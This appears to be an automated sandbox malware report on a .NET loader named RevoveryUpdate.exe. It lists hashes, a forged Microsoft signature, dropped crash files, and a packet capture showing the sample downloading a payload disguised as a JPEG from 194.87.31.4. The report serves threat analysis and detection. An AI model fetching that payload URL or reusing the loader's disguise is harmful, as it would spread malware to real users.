  • 3%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
NameSourceMaliciousAntivirus DetectionReputation
http://194.87.31.4/loader/loader/uploads/RevoveryUpdate_Kzpiufar.jpgENhhgoltbysvejfrytawmnj.HqaevkxuP355uy6y7d.exefalse
  • Avira URL Cloud: safe
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameP355uy6y7d.exe, 00000000.00000002.500986810.0000000004084000.00000004.00000800.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000002.500844010.0000000004011000.00000004.00000800.00020000.00000000.sdmpfalse
    high
    http://194.87.31.4P355uy6y7d.exe, 00000000.00000002.500986810.0000000004084000.00000004.00000800.00020000.00000000.sdmp, P355uy6y7d.exe, 00000000.00000002.500844010.0000000004011000.00000004.00000800.00020000.00000000.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    194.87.31.4
    unknownRussian Federation
    49392ASBAXETNRUfalse
    Joe Sandbox Version:34.0.0 Boulder Opal
    Analysis ID:630062
    Start date and time: 19/05/202212:57:102022-05-19 12:57:10 +02:00
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 5m 24s
    Hypervisor based Inspection enabled:false
    Report type:light
    Sample file name:P355uy6y7d (renamed file extension from none to exe)
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
    Number of analysed new started processes analysed:23
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal64.evad.winEXE@2/4@0/1
    EGA Information:Failed
    HDC Information:
    • Successful, ratio: 16.7% (good quality ratio 16.7%)
    • Quality average: 83.5%
    • Quality standard deviation: 16.5%
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
    • TCP Packets have been reduced to 100
    • Excluded IPs from analysis (whitelisted): 104.208.16.94
    • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
    • Execution Graph export aborted for target P355uy6y7d.exe, PID 6948 because it is empty
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtSetInformationFile calls found.
    TimeTypeDescription
    12:58:56API Interceptor1x Sleep call for process: WerFault.exe modified
    No context
    No context
    No context
    No context
    No context
    Process:C:\Windows\System32\WerFault.exe
    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
    Category:dropped
    Size (bytes):65536
    Entropy (8bit):1.0911164644330105
    Encrypted:false
    SSDEEP:96:djFGMn50+XgIfuaQqYMlHGxsiKpXIQcQUc6FcE/cw37Dp+BHUHZ0ownOgFkEwk6s:BVz3wUHKBlIa1cOqyG/u7sPS274ltE
    MD5:1112C2BDE6D1FAD635C04BA83E7CA865
    SHA1:2847CCADEA24E94449BFD17B116637B90897FE0C
    SHA-256:CA821EFDA66FA874FBD009C6828BE681F29DF13AE5E8D5727C529A04579A6608
    SHA-512:5F73B055428160E1CF48965FFAB0C18966A4D6981CA669F43CD8F7473AA2B438B57D91792E6B3383D2C361416CC4199D1107DB39B5AE71F885F2688A4C261D50
    Malicious:true
    Reputation:low
    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.7.4.6.3.9.0.3.7.2.2.8.2.4.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.7.4.6.3.9.0.5.6.2.9.0.5.3.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.a.f.c.b.f.8.6.-.3.a.9.1.-.4.e.a.a.-.9.9.2.8.-.3.b.a.8.e.3.3.6.2.c.3.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.1.7.7.f.7.0.c.-.b.c.0.c.-.4.2.1.8.-.8.6.b.e.-.0.5.5.8.4.c.d.4.7.a.0.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.P.3.5.5.u.y.6.y.7.d...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.v.o.v.e.r.y.U.p.d.a.t.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.2.4.-.0.0.0.1.-.0.0.1.7.-.b.8.e.d.-.e.3.c.4.b.a.6.b.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.0.2.3.3.c.f.0.4.3.f.2.d.7.6.4.5.1.d.f.5.4.9.8.f.a.c.c.c.8.e.b.0.0.0.0.0.0.0.0.!.0.0.0.0.4.4.b.8.c.a.8.8.5.6.a.4.9.0.f.6.7.b.d.8.7.b.6.1.a.a.e.e.9.f.a.6.5.9.8.6.1.8.1.3.!.P.3.5.5.u.
    Process:C:\Windows\System32\WerFault.exe
    File Type:Mini DuMP crash report, 16 streams, Thu May 19 19:58:24 2022, 0x1205a4 type
    Category:dropped
    Size (bytes):401160
    Entropy (8bit):2.957989987936535
    Encrypted:false
    SSDEEP:3072:L4kWg6wrnwak1v5QH0G4lmF0+/QgqjGeahYr4PZkl9cfdW+JrRyw:sk3nrOjH1WY8PZvW+7l
    MD5:3E6762E99AFEBC71C19EB8452630C15B
    SHA1:3079004F1AB77448470251BB97D484F6BC7E6129
    SHA-256:1E6CE67EE6738DA9B14502509FDEF27810F93D8EB80B5091B61266687096FB95
    SHA-512:655034E064492FF548321FCF580D2F859D988C2418A46965432C14861D396521A35CEF99EC8618E81D2E783357B477ED9E07B65250C1BDA9C16C8B0AA89D8CAA
    Malicious:false
    Reputation:low
    Preview:MDMP....... .......`..b........................T...........<....#..........T#.......)...}..........l.......8...........T...........@4..............`+..........L-...................................................................U...........B.......-......Lw......................T.......$...S..b.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WerFault.exe
    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
    Category:dropped
    Size (bytes):8800
    Entropy (8bit):3.6960811409252265
    Encrypted:false
    SSDEEP:192:Rrl7r3GLNiZ6te6YoiI9Ml4ZgmfZQSnCprH89bn2dfrNm:RrlsNi0E6YdI9McgmfKSnnUfs
    MD5:5F578A64C53EA0CC21393A2D36DAAC59
    SHA1:B3E190E53ED2C81A84F270F773214C5D05595778
    SHA-256:45B85F0082969CFAD98AAEDBB3C2A0A9EA1E72084C9E6DEF3D441303E535902C
    SHA-512:C3B4B1B698CC62EFD56E8020F2E00AF4423DE324F5E9E98FD04FFF796EAC078E12ECE7D120D0F1B934F7F7F61E0A1AA7005B3A60FD1E5BDDEDE18CD8D288A541
    Malicious:false
    Reputation:low
    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.4.8.<./.P.i.d.>.......
    Process:C:\Windows\System32\WerFault.exe
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):4795
    Entropy (8bit):4.462266573144948
    Encrypted:false
    SSDEEP:48:cvIwSD8zsuJgtBI9tkcWgc8sqYjh8fm8M4JwMNzsFP1oyq8veNzWT5ABd:uITfkAVgrsqYaJwM6oWeQT5ABd
    MD5:03188F452F07F1FB52381AAB2183D0BD
    SHA1:90DB7B7C8D1A40F5BCB1AB4AE408795D0158B3E1
    SHA-256:FF42CDA6F5C9076D66BB53A15F526A887C60399B9DD3697E4DA6E3DB7822ADC6
    SHA-512:6CB34A36BDC0B8E52F3AD6670B37EF13EDF3E2187558A27477D2DF7D0750C6E9C5D05A1D6E31662059FF309C20E9A5777C48E0EF780D76B53BCE954B282938FE
    Malicious:false
    Reputation:low
    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1522389" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
    File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
    Entropy (8bit):7.920655166214458
    TrID:
    • Win64 Executable GUI Net Framework (217006/5) 49.88%
    • Win64 Executable GUI (202006/5) 46.43%
    • Win64 Executable (generic) (12005/4) 2.76%
    • Generic Win/DOS Executable (2004/3) 0.46%
    • DOS Executable Generic (2002/1) 0.46%
    File name:P355uy6y7d.exe
    File size:2276808
    MD5:36cf17949de5c5b6352c9d43ae2b6171
    SHA1:44b8ca8856a490f67bd87b61aaee9fa659861813
    SHA256:4e88ad28c28a0c02bec0b70271acf0ad1898f64ee1e9ef5a86f844001fb3a19a
    SHA512:7918342745abccc91d6cd65b1450463929aad89ce373b168cbf2ff0c93d0677bf4a391d19eee0fea57146e1e47c80240c56435eff86980791a35ff5c9896ded7
    SSDEEP:49152:Ayuh7CBWXj2KeHJmuAK3u5LBE3cRJ0/fyJPU+XAzpHjoPqp:tQ7HPeN7+5nRJ8AfO3p
    TLSH:B3B500919965CC89D4A6DFF328F685B7D30E1FED6E2094AC3240FF351AB64AC1B40D26
    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....r............"...0... .............. .....@..... ........................"...........@...@......@............... .....
    Icon Hash:e8b2f0f0ecf0f2e8
    Entrypoint:0x140000000
    Entrypoint Section:
    Digitally signed:true
    Imagebase:0x140000000
    Subsystem:windows gui
    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Time Stamp:0xFF1B72D1 [Mon Aug 17 21:49:05 2105 UTC]
    TLS Callbacks:
    CLR (.Net) Version:v4.0.30319
    OS Version Major:4
    OS Version Minor:0
    File Version Major:4
    File Version Minor:0
    Subsystem Version Major:4
    Subsystem Version Minor:0
    Import Hash:
    Signature Valid:false
    Signature Issuer:CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
    Signature Validation Error:The digital signature of the object did not verify
    Error Number:-2146869232
    Not Before, Not After
    • 9/2/2021 11:32:59 AM 9/1/2022 11:32:59 AM
    Subject Chain
    • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
    Version:3
    Thumbprint MD5:D15B2B9631F8B37BA8D83A5AE528A8BB
    Thumbprint SHA-1:8740DF4ACB749640AD318E4BE842F72EC651AD80
    Thumbprint SHA-256:2EB421FBB33BBF9C8F6B58C754B0405F40E02CB6328936AAE39DB7A24880EA21
    Serial:33000002528B33AAF895F339DB000000000252
    Instruction
    dec ebp
    pop edx
    nop
    add byte ptr [ebx], al
    add byte ptr [eax], al
    add byte ptr [eax+eax], al
    add byte ptr [eax], al
    NameVirtual AddressVirtual Size Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_RESOURCE0x2040000x27f96.rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
    IMAGE_DIRECTORY_ENTRY_SECURITY0x2296000x27c8.rsrc
    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
    .text0x20000x20133c0x201400unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    .rsrc0x2040000x27f960x28000False0.0666687011719data3.46254253895IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    NameRVASizeTypeLanguageCountry
    RT_ICON0x2042800x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
    RT_ICON0x214aa80x94a8data
    RT_ICON0x21df500x5488data
    RT_ICON0x2233d80x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 64767, next used block 4282318848
    RT_ICON0x2276000x25a8data
    RT_ICON0x229ba80x10a8data
    RT_ICON0x22ac500x988data
    RT_ICON0x22b5d80x468GLS_BINARY_LSB_FIRST
    RT_GROUP_ICON0x22ba400x76data
    RT_VERSION0x22bab80x2f4data
    RT_MANIFEST0x22bdac0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
    DescriptionData
    Translation0x0000 0x04b0
    LegalCopyright
    Assembly Version1.0.0.0
    InternalNameRevoveryUpdate.exe
    FileVersion1.0.0.0
    CompanyName
    LegalTrademarks
    Comments
    ProductName
    ProductVersion1.0.0.0
    FileDescription
    OriginalFilenameRevoveryUpdate.exe
    TimestampSource PortDest PortSource IPDest IP
    May 19, 2022 12:58:15.303103924 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.326575041 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.326698065 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.329128027 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.354022026 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.354089022 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.354129076 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.354168892 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.354183912 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.354211092 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.354229927 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.354254007 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.354293108 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.354310989 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.354334116 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.354374886 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.354391098 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.354414940 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.354470968 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.377119064 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.377182961 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.377223969 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.377264023 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.377302885 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.377320051 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.377343893 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.377357960 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.377384901 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.377404928 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.377424955 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.377465963 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.377489090 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.377504110 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.377545118 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.377556086 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.377584934 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.377624035 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.377636909 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.377664089 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.377702951 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.377718925 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.377748013 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.377789974 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.377801895 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.377829075 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.377870083 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.377887011 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.377909899 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.377969027 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.400707960 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.400784016 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.400825977 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.400866032 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.400871992 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.400907040 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.400923967 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.400950909 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.400990963 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.401009083 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.401031971 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.401072979 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.401084900 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.401112080 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.401153088 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.401192904 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.401194096 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.401237965 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.401247025 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.401281118 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.401321888 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.401331902 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.401361942 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.401402950 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.401412010 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.401443005 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.401484013 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.401494980 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.401525021 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.401566029 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.401575089 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.401607990 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.401647091 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.401658058 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.401686907 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.401726961 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.401740074 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.401770115 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.401809931 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.401829004 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.401849985 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.401891947 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.401906013 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.401933908 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.401972055 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.401987076 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.402013063 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.402054071 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.402067900 CEST4973680192.168.2.5194.87.31.4
    May 19, 2022 12:58:15.402096033 CEST8049736194.87.31.4192.168.2.5
    May 19, 2022 12:58:15.402137041 CEST8049736194.87.31.4192.168.2.5
    • 194.87.31.4
    Session IDSource IPSource PortDestination IPDestination PortProcess
    0192.168.2.549736194.87.31.480C:\Users\user\Desktop\P355uy6y7d.exe
    TimestampkBytes transferredDirectionData
    May 19, 2022 12:58:15.329128027 CEST212OUTGET /loader/loader/uploads/RevoveryUpdate_Kzpiufar.jpg HTTP/1.1
    Host: 194.87.31.4
    Connection: Keep-Alive
    May 19, 2022 12:58:15.354022026 CEST213INHTTP/1.1 200 OK
    Date: Thu, 19 May 2022 10:58:15 GMT
    Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.5
    Last-Modified: Thu, 19 May 2022 10:41:29 GMT
    ETag: "3414a-5df5b043804db"
    Accept-Ranges: bytes
    Content-Length: 213322
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: image/jpeg
    Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 c4 00 00 00 88 76 75 65 64 00 00 03 4c 00 00 00 86 76 69 65 77 00 00 03 d4 00 00 00 24 6c 75 6d 69 00 00 03 f8 00 00 00 14 6d 65 61 73 00 00 04 0c 00 00 00 24 74 65 63 68 00 00 04 30 00 00 00 0c 72 54 52 43 00 00 04 3c 00 00 08 0c 67 54 52 43 00 00 04 3c 00 00 08 0c 62 54 52 43 00 00 04 3c 00 00 08 0c 74 65 78 74 00 00 00 00 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 20 48 65 77 6c 65 74 74 2d 50 61 63 6b 61 72 64 20 43 6f 6d 70 61 6e 79 00 00 64 65 73 63 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 f3 51 00 01 00 00 00 01 16 cc 58 59 5a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 64 65 73 63 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 65 63 2e 63 68 00 00 00 00 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 65 63 2e 63 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 65 73 63 00 00 00 00 00 00 00 2e 49 45 43 20 36 31 39 36 36 2d 32 2e 31 20 44 65 66 61 75 6c 74 20 52 47 42 20 63 6f 6c 6f 75 72 20 73 70 61 63 65 20 2d 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 2e 49 45 43 20 36 31 39 36 36 2d 32 2e 31 20 44 65 66 61 75 6c 74 20 52 47 42 20 63 6f 6c 6f 75 72 20 73 70 61 63 65 20 2d 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 65 73 63 00 00 00 00 00 00 00 2c 52 65 66 65 72 65 6e 63 65 20 56 69 65 77 69 6e 67 20 43 6f 6e 64 69 74 69 